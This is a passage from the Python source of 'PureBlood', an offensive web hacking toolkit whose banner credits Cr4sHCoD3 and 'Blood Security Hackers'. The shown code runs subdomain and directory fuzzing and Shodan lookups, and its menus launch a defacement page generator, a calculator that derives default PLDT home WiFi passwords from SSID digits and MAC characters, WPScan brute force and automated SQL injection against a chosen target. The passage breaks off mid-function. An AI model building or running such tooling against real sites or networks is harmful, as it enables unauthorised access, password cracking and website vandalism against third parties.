1430 | ss_urls = [] 1431 | ss_subdomain_list = open(subdomain_list, 'r') 1432 | ss_subdomain_list = ss_subdomain_list.read().splitlines() 1433 | for i in ss_subdomain_list: 1434 | ss_urls.append(i + '.' + ss_hostname) 1435 | for i in ss_urls: 1436 | t = threading.Thread(target=subdomain_scanner, args=(i, so_200, so_301, so_302, so_403,)) 1437 | t.start() 1438 | t.join() 1439 | self.ss_200_result = so_200 1440 | self.ss_301_result = so_301 1441 | self.ss_302_result = so_302 1442 | self.ss_403_result = so_403 1443 | return self.ss_200_result, self.ss_301_result, self.ss_302_result, self.ss_403_result 1444 | 1445 | def cms_detect(self, cd_hostname): 1446 | cd_cms = [] 1447 | cd_cms_version = [] 1448 | cms_detect_request = requests.get('https://whatcms.org/?s=' + cd_hostname) 1449 | cd_soup = BeautifulSoup(cms_detect_request.content, 'html.parser') 1450 | cd_soup_div = cd_soup.find('div', attrs={'class': 'large text-center'}) 1451 | for i in cd_soup_div.find_all('span', attrs={'class': 'nowrap'}): 1452 | cd_cms_version.append(i.text) 1453 | cd_cms.append(cd_soup_div.find('a').text) 1454 | if not cd_cms: 1455 | cms_detect_final = '[!] - There\'s no CMS Detected!' 1456 | else: 1457 | cd_cms_version = cd_cms_version[1] 1458 | cms_detect_final = cd_cms[0].replace('/c/', '') 1459 | cms_detect_final = cms_detect_final + ' - ' + cd_cms_version 1460 | self.cms_detect_result = cms_detect_final 1461 | return self.cms_detect_result 1462 | 1463 | def reverse_ip_lookup(self, ril_hostname): 1464 | reverse_ip_lookup_request = requests.get('https://api.hackertarget.com/reverseiplookup/?q=' + ril_hostname) 1465 | reverse_ip_lookup_response = reverse_ip_lookup_request.text 1466 | reverse_ip_lookup_final = """{0}""".format(str(reverse_ip_lookup_response)) 1467 | self.reverse_ip_lookup_result = reverse_ip_lookup_final 1468 | return self.reverse_ip_lookup_result 1469 | 1470 | def subnet_lookup(self, subnet_input): 1471 | subnet_lookup_request = requests.get('https://api.hackertarget.com/subnetcalc/?q=' + subnet_input) 1472 | subnet_lookup_response = subnet_lookup_request.text 1473 | subnet_lookup_final = """{0}""".format(str(subnet_lookup_response)) 1474 | self.subnet_lookup_result = subnet_lookup_final 1475 | return self.subnet_lookup_result 1476 | 1477 | def links_extract(self, le_url): 1478 | links_extract_request = requests.get('https://api.hackertarget.com/pagelinks/?q=' + le_url) 1479 | links_extract_response = links_extract_request.text 1480 | links_extract_final = """{0}""".format(str(links_extract_response)) 1481 | self.links_extract_result = links_extract_final 1482 | return self.links_extract_result 1483 | 1484 | def directory_fuzz(self, df_url, directory_list): 1485 | directory_fuzz_final1 = [] 1486 | directory_fuzz_final2 = [] 1487 | directory_fuzz_final3 = [] 1488 | directory_list_open = open(directory_list, 'r') 1489 | directory_list = directory_list_open.read().splitlines() 1490 | df_url_list = [] 1491 | ii = 0 1492 | for i in directory_list: 1493 | if '/' in directory_list[ii]: 1494 | df_url_list.append(df_url + i) 1495 | else: 1496 | df_url_list.append(df_url + '/' + i) 1497 | ii = ii + 1 1498 | for i in df_url_list: 1499 | print (i) 1500 | t = threading.Thread(target=directory_scanner, args=(i, directory_fuzz_final1, directory_fuzz_final2, directory_fuzz_final3)) 1501 | t.start() 1502 | t.join() 1503 | self.directory_fuzz_result1 = directory_fuzz_final1 1504 | self.directory_fuzz_result2 = directory_fuzz_final2 1505 | self.directory_fuzz_result3 = directory_fuzz_final3 1506 | return self.directory_fuzz_result1, self.directory_fuzz_result2, self.directory_fuzz_result3\ 1507 | 1508 | def file_fuzz(self, ff_url, file_list): 1509 | file_fuzz_final1 = [] 1510 | file_fuzz_final2 = [] 1511 | file_fuzz_final3 = [] 1512 | file_list_open = open(file_list, 'r') 1513 | file_list = file_list_open.read().splitlines() 1514 | ff_url_list = [] 1515 | for i in file_list: 1516 | ff_url_list.append(ff_url + '/' + i) 1517 | for i in ff_url_list: 1518 | t = threading.Thread(target=file_scanner, args=(i, file_fuzz_final1, file_fuzz_final2, file_fuzz_final3)) 1519 | t.start() 1520 | t.join() 1521 | self.file_fuzz_result1 = file_fuzz_final1 1522 | self.file_fuzz_result2 = file_fuzz_final2 1523 | self.file_fuzz_result3 = file_fuzz_final3 1524 | return self.file_fuzz_result1, self.file_fuzz_result2, self.file_fuzz_result3 1525 | 1526 | def shodan_search(self, query, ss_SHODAN_API_KEY): 1527 | shodan_api = shodan.Shodan(ss_SHODAN_API_KEY) 1528 | try: 1529 | shodan_search_results = shodan_api.search(query) 1530 | self.shodan_search_result = shodan_search_results 1531 | return self.shodan_search_result 1532 | except shodan.APIError as e: 1533 | print ('[!] - Error: {0}'.format(e)) 1534 | time.sleep(2) 1535 | web_pentest() 1536 | 1537 | def shodan_host_lookup(self, shodan_host, shl_SHODAN_API_KEY): 1538 | shodan_api = shodan.Shodan(shl_SHODAN_API_KEY) 1539 | try: 1540 | shodan_host_lookup_results = shodan_api.host(shodan_host) 1541 | self.shodan_host_lookup_result = shodan_host_lookup_results 1542 | return self.shodan_host_lookup_result 1543 | except shodan.APIError as e: 1544 | print ('[!] - Error: {0}'.format(e)) 1545 | time.sleep(2) 1546 | web_pentest() 1547 | 1548 | 1549 | 1550 | def create_directories(): 1551 | if not os.path.exists('outputs'): 1552 | os.mkdir('outputs') 1553 | else: 1554 | pass 1555 | if not os.path.exists('outputs/generator'): 1556 | os.mkdir('outputs/generator') 1557 | else: 1558 | pass 1559 | if not os.path.exists('outputs/web_pentest'): 1560 | os.mkdir('outputs/web_pentest') 1561 | else: 1562 | pass 1563 | if not os.path.exists('outputs/web_pentest/shodan'): 1564 | os.mkdir('outputs/web_pentest/shodan') 1565 | else: 1566 | pass 1567 | if not os.path.exists('outputs/web_application_attack'): 1568 | os.mkdir('outputs/web_application_attack') 1569 | else: 1570 | pass 1571 | if not os.path.exists('external'): 1572 | os.mkdir('external') 1573 | else: 1574 | pass 1575 | 1576 | 1577 | 1578 | def clear(): 1579 | if platform.system() == 'Linux': 1580 | os.system('clear') 1581 | elif platform.system() == 'Windows': 1582 | os.system('cls') 1583 | elif platform.system() == 'Darwin': 1584 | os.system('clear') 1585 | else: 1586 | os.system('clear') 1587 | 1588 | 1589 | 1590 | def banner(): 1591 | try: 1592 | if sys.version_info[0] == 3: 1593 | banner = ("""{1} 1594 | ██▓███ █ ██ ██▀███ ▓█████ ▄▄▄▄ ██▓ ▒█████ ▒█████ ▓█████▄ 1595 | ▓██░ ██▒ ██ ▓██▒▓██ ▒ ██▒▓█ ▀ ▓█████▄ ▓██▒ ▒██▒ ██▒▒██▒ ██▒▒██▀ ██▌ 1596 | ▓██░ ██▓▒▓██ ▒██░▓██ ░▄█ ▒▒███ ▒██▒ ▄██▒██░ ▒██░ ██▒▒██░ ██▒░██ █▌ 1597 | ▒██▄█▓▒ ▒▓▓█ ░██░▒██▀▀█▄ ▒▓█ ▄ ▒██░█▀ ▒██░ ▒██ ██░▒██ ██░░▓█▄ ▌ 1598 | ▒██▒ ░ ░▒▒█████▓ ░██▓ ▒██▒░▒████▒░▓█ ▀█▓░██████▒░ ████▓▒░░ ████▓▒░░▒████▓ 1599 | ▒▓▒░ ░ ░░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░░░ ▒░ ░░▒▓███▀▒░ ▒░▓ ░░ ▒░▒░▒░ ░ ▒░▒░▒░ ▒▒▓ ▒ 1600 | ░▒ ░ ░░▒░ ░ ░ ░▒ ░ ▒░ ░ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ▒ ▒░ ░ ▒ ▒░ ░ ▒ ▒ 1601 | ░░ ░░░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ░ ░ ░ 1602 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 1603 | ░ ░ 1604 | 1605 | {2}--={3}[ {0}{5}Author: Cr4sHCoD3 {3}]{2}=-- 1606 | {4}| {2}-- --={3}[ {0}{5}Version: 2 {3}]{2}=-- -- {4}| 1607 | | {2}-- --={3}[ {0}{5}Website: https://github.com/cr4shcod3 {3}]{2}=-- -- {4}| 1608 | | {2}-- --={3}[ {0}{5}PureHackers ~ Blood Security Hackers {3}]{2}=-- -- {4}| 1609 | {0} 1610 | 1611 | 1612 | """.format(reset, red, green, blue, yellow, bold)) 1613 | elif sys.version_info[0] == 2: 1614 | banner = ("""{1} 1615 | ██▓███ █ ██ ██▀███ ▓█████ ▄▄▄▄ ██▓ ▒█████ ▒█████ ▓█████▄ 1616 | ▓██░ ██▒ ██ ▓██▒▓██ ▒ ██▒▓█ ▀ ▓█████▄ ▓██▒ ▒██▒ ██▒▒██▒ ██▒▒██▀ ██▌ 1617 | ▓██░ ██▓▒▓██ ▒██░▓██ ░▄█ ▒▒███ ▒██▒ ▄██▒██░ ▒██░ ██▒▒██░ ██▒░██ █▌ 1618 | ▒██▄█▓▒ ▒▓▓█ ░██░▒██▀▀█▄ ▒▓█ ▄ ▒██░█▀ ▒██░ ▒██ ██░▒██ ██░░▓█▄ ▌ 1619 | ▒██▒ ░ ░▒▒█████▓ ░██▓ ▒██▒░▒████▒░▓█ ▀█▓░██████▒░ ████▓▒░░ ████▓▒░░▒████▓ 1620 | ▒▓▒░ ░ ░░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░░░ ▒░ ░░▒▓███▀▒░ ▒░▓ ░░ ▒░▒░▒░ ░ ▒░▒░▒░ ▒▒▓ ▒ 1621 | ░▒ ░ ░░▒░ ░ ░ ░▒ ░ ▒░ ░ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ▒ ▒░ ░ ▒ ▒░ ░ ▒ ▒ 1622 | ░░ ░░░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ░ ░ ░ 1623 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 1624 | ░ ░ 1625 | 1626 | {2}--={3}[ {0}{5}Author: Cr4sHCoD3 {3}]{2}=-- 1627 | {4}| {2}-- --={3}[ {0}{5}Version: 2 {3}]{2}=-- -- {4}| 1628 | | {2}-- --={3}[ {0}{5}Website: https://github.com/cr4shcod3 {3}]{2}=-- -- {4}| 1629 | | {2}-- --={3}[ {0}{5}PureHackers ~ Blood Security Hackers {3}]{2}=-- -- {4}| 1630 | {0} 1631 | 1632 | 1633 | """.format(reset, red, green, blue, yellow, bold)).decode('utf-8') 1634 | print (banner) 1635 | except: 1636 | if sys.version_info[0] == 3: 1637 | banner = ("""{1} 1638 | o--o o--o o o 1639 | | | | | | | 1640 | O--o o o o-o o-o O--o | o-o o-o o-O 1641 | | | | | |-' | | | | | | | | | 1642 | o o--o o o-o o--o o o-o o-o o-o 1643 | 1644 | {2}--={3}[ {0}{5}Author: Cr4sHCoD3 {3}]{2}=-- 1645 | {4}| {2}-- --={3}[ {0}{5}Version: 2 {3}]{2}=-- -- {4}| 1646 | | {2}-- --={3}[ {0}{5}Website: https://github.com/cr4shcod3 {3}]{2}=-- -- {4}| 1647 | | {2}-- --={3}[ {0}{5}PureHackers ~ Blood Security Hackers {3}]{2}=-- -- {4}| 1648 | {0} 1649 | 1650 | 1651 | """.format(reset, red, green, blue, yellow, bold)) 1652 | elif sys.version_info[0] == 2: 1653 | banner = ("""{1} 1654 | o--o o--o o o 1655 | | | | | | | 1656 | O--o o o o-o o-o O--o | o-o o-o o-O 1657 | | | | | |-' | | | | | | | | | 1658 | o o--o o o-o o--o o o-o o-o o-o 1659 | 1660 | {2}--={3}[ {0}{5}Author: Cr4sHCoD3 {3}]{2}=-- 1661 | {4}| {2}-- --={3}[ {0}{5}Version: 2 {3}]{2}=-- -- {4}| 1662 | | {2}-- --={3}[ {0}{5}Website: https://github.com/cr4shcod3 {3}]{2}=-- -- {4}| 1663 | | {2}-- --={3}[ {0}{5}PureHackers ~ Blood Security Hackers {3}]{2}=-- -- {4}| 1664 | {0} 1665 | 1666 | 1667 | """.format(reset, red, green, blue, yellow, bold)).decode('utf-8') 1668 | print (banner) 1669 | 1670 | 1671 | 1672 | def set_target(target, wfunc): 1673 | global url 1674 | global hostname 1675 | global ip 1676 | if '=' in target and wfunc != 2: 1677 | target = urlparse(target) 1678 | if target.scheme == '': 1679 | target = ('{0}'.format(target.netloc)) 1680 | else: 1681 | target = ('{0}://{1}'.format(target.scheme, target.netloc)) 1682 | if 'http://' in target: 1683 | url = target 1684 | hostname = target.replace('http://', '') 1685 | elif 'https://' in target: 1686 | url = target 1687 | hostname = target.replace('https://', '') 1688 | if '://' not in target: 1689 | url = 'http://' + target 1690 | hostname = target 1691 | if '1' == target[0] or '2' == target[0] or '3' == target[0] or '4' == target[0] or '5' == target[0] or '6' == target[0] or '7' == target[0] or '8' == target[0] or '9' == target[0]: 1692 | ip = target 1693 | if wfunc == 2: 1694 | pass 1695 | else: 1696 | ip = socket.gethostbyname(hostname) 1697 | if wfunc == 1: 1698 | web_pentest() 1699 | elif wfunc == 2: 1700 | web_application_attack() 1701 | else: 1702 | main() 1703 | 1704 | 1705 | 1706 | def generator(): 1707 | print ("""{3}[ {5}Generator {3}] 1708 | 1709 | {2}01{3}) {5}Deface Page Generator 1710 | {2}02{3}) {5}Password Generator 1711 | {2}03{3}) {5}PLDT WiFi Password Calculator 1712 | {2}04{3}) {5}Text To Hash 1713 | {2}90{3}) {5}Back To Menu 1714 | {2}99{3}) {5}Exit 1715 | {0}""".format(reset, red, green, blue, yellow, cyan)) 1716 | if sys.version_info[0] == 3: 1717 | try: 1718 | choice = int(input('{0}PureBlood{1}({3}Generator{1})> {2}'.format(green, blue, cyan, red))) 1719 | except KeyboardInterrupt: 1720 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 1721 | sys.exit() 1722 | except ValueError: 1723 | print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow)) 1724 | time.sleep(2) 1725 | print ('') 1726 | generator() 1727 | elif sys.version_info[0] == 2: 1728 | try: 1729 | choice = int(raw_input('{0}PureBlood{1}({3}Generator{1})> {2}'.format(green, blue, cyan, red))) 1730 | except KeyboardInterrupt: 1731 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 1732 | sys.exit() 1733 | except ValueError: 1734 | print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow)) 1735 | time.sleep(2) 1736 | print ('') 1737 | generator() 1738 | cgenerator = Generator() 1739 | if choice == 1: 1740 | print ('{0}='.format(red) * int(sizex)) 1741 | print (reset + bold) 1742 | if sys.version_info[0] == 3: 1743 | title = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Title{1})> {2}'.format(green, blue, cyan, red))) 1744 | shortcut_icon = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Shortcut Icon{1})> {2}'.format(green, blue, cyan, red))) 1745 | meta_description = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Meta Description{1})> {2}'.format(green, blue, cyan, red))) 1746 | meta_image = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Meta Image{1})> {2}'.format(green, blue, cyan, red))) 1747 | logo = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Logo{1})> {2}'.format(green, blue, cyan, red))) 1748 | hacker_name = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Hacker Name{1})> {2}'.format(green, blue, cyan, red))) 1749 | message1 = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Message 1{1})> {2}'.format(green, blue, cyan, red))) 1750 | message2 = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Message 2{1})> {2}'.format(green, blue, cyan, red))) 1751 | groups = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Group/s{1})> {2}'.format(green, blue, cyan, red))) 1752 | deface_page_output_filename = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Output Filename{1})> {2}'.format(green, blue, cyan, red))) 1753 | if sys.version_info[0] == 2: 1754 | title = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Title{1})> {2}'.format(green, blue, cyan, red))) 1755 | shortcut_icon = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Shortcut Icon{1})> {2}'.format(green, blue, cyan, red))) 1756 | meta_description = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Meta Description{1})> {2}'.format(green, blue, cyan, red))) 1757 | meta_image = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Meta Image{1})> {2}'.format(green, blue, cyan, red))) 1758 | logo = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Logo{1})> {2}'.format(green, blue, cyan, red))) 1759 | hacker_name = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Hacker Name{1})> {2}'.format(green, blue, cyan, red))) 1760 | message1 = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Message 1{1})> {2}'.format(green, blue, cyan, red))) 1761 | message2 = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Message 2{1})> {2}'.format(green, blue, cyan, red))) 1762 | groups = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Group/s{1})> {2}'.format(green, blue, cyan, red))) 1763 | deface_page_output_filename = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Output Filename{1})> {2}'.format(green, blue, cyan, red))) 1764 | gdeface_page = cgenerator.deface_page(title, shortcut_icon, meta_description, meta_image, logo, hacker_name, message1, message2, groups) 1765 | if '.html' in deface_page_output_filename: 1766 | deface_page_output_filename = deface_page_output_filename 1767 | else: 1768 | deface_page_output_filename = deface_page_output_filename + '.html' 1769 | deface_page_output_file = open('outputs/generator/' + deface_page_output_filename, 'w+') 1770 | deface_page_output_file.write(gdeface_page) 1771 | deface_page_output_file.close() 1772 | print ('\nOutput saved in outputs/generator/' + deface_page_output_filename + '{0}') 1773 | print (reset + bold) 1774 | print ('{0}='.format(red) * int(sizex)) 1775 | generator() 1776 | elif choice == 2: 1777 | if sys.version_info[0] == 3: 1778 | length = int(input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Length{1})> {2}'.format(green, blue, cyan, red))) 1779 | text = str(input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Text{1})> {2}'.format(green, blue, cyan, red))) 1780 | if sys.version_info[0] == 2: 1781 | length = int(raw_input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Length{1})> {2}'.format(green, blue, cyan, red))) 1782 | text = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Text{1})> {2}'.format(green, blue, cyan, red))) 1783 | gpassword_generator1, gpassword_generator2, gpassword_generator3 = cgenerator.password_generator(length, text) 1784 | print ('{0}='.format(red) * int(sizex)) 1785 | print (reset + bold) 1786 | print ('Random Password: ' + gpassword_generator1) 1787 | print ('MD5: ' + gpassword_generator2) 1788 | print ('L33T: ' + gpassword_generator3) 1789 | print (reset) 1790 | print ('{0}='.format(red) * int(sizex)) 1791 | generator() 1792 | elif choice == 3: 1793 | if sys.version_info[0] == 3: 1794 | print ('{2}[{1}#{2}] {3}- {4}Last 5 Numbers if any. EX: PLDTHOMEDSLXXXXX where X is the number{0}'.format(reset, green, blue, yellow, cyan)) 1795 | digit5 = str(input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Last 5 Digit{1})> {2}'.format(green, blue, cyan, red))) 1796 | print ('{2}[{1}#{2}] {3}- {4}Last 5 MAC Characters. EX: 00:4a:00:d0:44:c0 where 044C0 is the last 5 MAC Characters{0}'.format(reset, green, blue, yellow, cyan)) 1797 | mac5 = str(input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Last 5 MAC Char{1})> {2}'.format(green, blue, cyan, red))) 1798 | if sys.version_info[0] == 2: 1799 | print ('{2}[{1}#{2}] {3}- {4}Last 5 Numbers if any. EX: PLDTHOMEDSLXXXXX where X is the number{0}'.format(reset, green, blue, yellow, cyan)) 1800 | digit5 = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Last 5 Digit{1})> {2}'.format(green, blue, cyan, red))) 1801 | print ('{2}[{1}#{2}] {3}- {4}Last 5 MAC Characters. EX: 00:4a:00:d0:44:c0 where 044C0 is the last 5 MAC Characters{0}'.format(reset, green, blue, yellow, cyan)) 1802 | mac5 = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Last 5 MAC Char{1})> {2}'.format(green, blue, cyan, red))) 1803 | gpldt_password_calculator1, gpldt_password_calculator2, gpldt_password_calculator3, gpldt_password_calculator4, gpldt_password_calculator5 = cgenerator.pldt_password_calculator(digit5, mac5) 1804 | print ('{0}='.format(red) * int(sizex)) 1805 | print (reset + bold) 1806 | print ('[#] - Possible Password of the PLDT WIFI:') 1807 | print ('\nFOR : PLDTHOMEDSL, PLDTmyDSLPAL, and PLDTmyDSLBiz') 1808 | for i in gpldt_password_calculator1: 1809 | print (' > ' + i) 1810 | print ('\nFOR : PLDTHOMEDSLxxxxx') 1811 | for i in gpldt_password_calculator2: 1812 | print (' > ' + i) 1813 | print ('\nFOR : PLDTHOMEFIBR_xxxxxx') 1814 | print (' > ' + gpldt_password_calculator3) 1815 | print ('\nFOR : PLDTHOMEFIBRxxxxxx') 1816 | for i in gpldt_password_calculator4: 1817 | print (' > ' + i) 1818 | print ('\nFOR : HomeBro_Ultera') 1819 | print (' > ' + gpldt_password_calculator5) 1820 | print (reset) 1821 | print ('{0}='.format(red) * int(sizex)) 1822 | generator() 1823 | elif choice == 4: 1824 | if sys.version_info[0] == 3: 1825 | text = str(input('{0}PureBlood{1}>{0}Generator{1}>{0}TextToHash{1}>({3}Text{1})> {2}'.format(green, blue, cyan, red))) 1826 | if sys.version_info[0] == 2: 1827 | text = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>{0}TextToHash{1}>({3}Text{1})> {2}'.format(green, blue, cyan, red))) 1828 | gtext_to_hash = cgenerator.text_to_hash(text) 1829 | print ('{0}='.format(red) * int(sizex)) 1830 | print (reset + bold) 1831 | print (gtext_to_hash) 1832 | print (reset) 1833 | print ('{0}='.format(red) * int(sizex)) 1834 | generator() 1835 | elif choice == 90: 1836 | main() 1837 | elif choice == 99: 1838 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 1839 | sys.exit() 1840 | else: 1841 | print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow)) 1842 | time.sleep(2) 1843 | print ('') 1844 | generator() 1845 | 1846 | 1847 | 1848 | def web_application_attack(): 1849 | global cweb_application_atttack 1850 | print ("""{3}[ {5}Web Application Attack {3}] 1851 | 1852 | {2}01{3}) {5}Wordpress 1853 | {2}02{3}) {5}SQL Injection 1854 | {2}90{3}) {5}Back To Menu 1855 | {2}95{3}) {5}Set Target 1856 | {2}99{3}) {5}Exit 1857 | {0}""".format(reset, red, green, blue, yellow, cyan)) 1858 | if sys.version_info[0] == 3: 1859 | try: 1860 | choice = int(input('{0}PureBlood{1}({3}WebApplicationAttack{1})> {2}'.format(green, blue, cyan, red))) 1861 | except KeyboardInterrupt: 1862 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 1863 | sys.exit() 1864 | except ValueError: 1865 | print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow)) 1866 | time.sleep(2) 1867 | print ('') 1868 | web_application_attack() 1869 | elif sys.version_info[0] == 2: 1870 | try: 1871 | choice = int(raw_input('{0}PureBlood{1}({3}WebApplicationAttack{1})> {2}'.format(green, blue, cyan, red))) 1872 | except KeyboardInterrupt: 1873 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 1874 | sys.exit() 1875 | except ValueError: 1876 | print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow)) 1877 | time.sleep(2) 1878 | print ('') 1879 | web_application_attack() 1880 | cweb_application_atttack = WebApplicationAttack() 1881 | if choice == 1: 1882 | print ("""{3}[ {5}Web Application Attack {3}] 1883 | 1884 | {2}01{3}) {5}WPScan (Kali Linux) - Install manually on other OS 1885 | {2}02{3}) {5}WPScan Bruteforce (Kali Linux) - Install manually on other OS 1886 | {2}03{3}) {5}Wordpress Plugins Vulnerability Checker 1887 | {2}90{3}) {5}Back To Menu 1888 | {2}95{3}) {5}Set Target 1889 | {2}99{3}) {5}Exit 1890 | {0}""".format(reset, red, green, blue, yellow, cyan)) 1891 | if sys.version_info[0] == 3: 1892 | try: 1893 | choice1 = int(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>({3}Wordpress{1})> {2}'.format(green, blue, cyan, red))) 1894 | except KeyboardInterrupt: 1895 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 1896 | sys.exit() 1897 | except ValueError: 1898 | print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow)) 1899 | time.sleep(2) 1900 | print ('') 1901 | web_application_attack() 1902 | elif sys.version_info[0] == 2: 1903 | try: 1904 | choice1 = int(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>({3}Wordpress{1})> {2}'.format(green, blue, cyan, red))) 1905 | except KeyboardInterrupt: 1906 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 1907 | sys.exit() 1908 | except ValueError: 1909 | print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow)) 1910 | time.sleep(2) 1911 | print ('') 1912 | web_application_attack() 1913 | if choice1 == 1: 1914 | print ('{0}='.format(red) * int(sizex)) 1915 | print (reset + bold) 1916 | try: 1917 | wap_wp_scan = cweb_application_atttack.wp_scan(url) 1918 | except NameError: 1919 | print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan)) 1920 | time.sleep(2) 1921 | web_application_attack() 1922 | except KeyboardInterrupt: 1923 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 1924 | sys.exit() 1925 | print (reset) 1926 | print ('{0}='.format(red) * int(sizex)) 1927 | web_application_attack() 1928 | elif choice1 == 2: 1929 | print ('{0}='.format(red) * int(sizex)) 1930 | print (reset + bold) 1931 | try: 1932 | wap_wp_scan_bruteforce = cweb_application_atttack.wp_scan_bruteforce(url) 1933 | except NameError: 1934 | print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan)) 1935 | time.sleep(2) 1936 | web_application_attack() 1937 | except KeyboardInterrupt: 1938 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 1939 | sys.exit() 1940 | print (reset) 1941 | print ('{0}='.format(red) * int(sizex)) 1942 | print ('') 1943 | web_application_attack() 1944 | elif choice1 == 3: # Exploit-DB.com 1945 | print ('{0}='.format(red) * int(sizex)) 1946 | print (reset + bold) 1947 | try: 1948 | wap_wordpress_plugin_checker = cweb_application_atttack.wordpress_vulnerability_check(url) 1949 | except NameError: 1950 | print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan)) 1951 | time.sleep(2) 1952 | web_application_attack() 1953 | except KeyboardInterrupt: 1954 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 1955 | sys.exit() 1956 | print (reset) 1957 | print ('{0}='.format(red) * int(sizex)) 1958 | print ('') 1959 | web_application_attack() 1960 | elif choice1 == 90: 1961 | main() 1962 | elif choice1 == 95: 1963 | print ('{2}[{1}#{2}] {3}- {4}Please don\'t put "/" in the end of the Target.{0}'.format(reset, green, blue, yellow, cyan)) 1964 | if sys.version_info[0] == 3: 1965 | target = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red))) 1966 | if sys.version_info[0] == 2: 1967 | target = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red))) 1968 | set_target(target, 2) 1969 | elif choice1 == 99: 1970 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 1971 | sys.exit() 1972 | else: 1973 | print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow)) 1974 | time.sleep(2) 1975 | print ('') 1976 | web_application_attack() 1977 | elif choice == 2: 1978 | print ('{0}='.format(red) * int(sizex)) 1979 | print (reset + bold) 1980 | try: 1981 | wap_auto_sql_injection = cweb_application_atttack.auto_sql_injection(url) 1982 | except NameError: 1983 | print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan)) 1984 | time.sleep(2) 1985 | print ('') 1986 | web_application_attack() 1987 | except KeyboardInterrupt: 1988 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 1989 | sys.exit() 1990 | print (reset) 1991 | print ('{0}='.format(red) * int(sizex)) 1992 | print ('') 1993 | web_application_attack() 1994 | elif choice == 3: 1995 | print ('{0}='.format(red) * int(sizex)) 1996 | print (reset + bold) 1997 | try: 1998 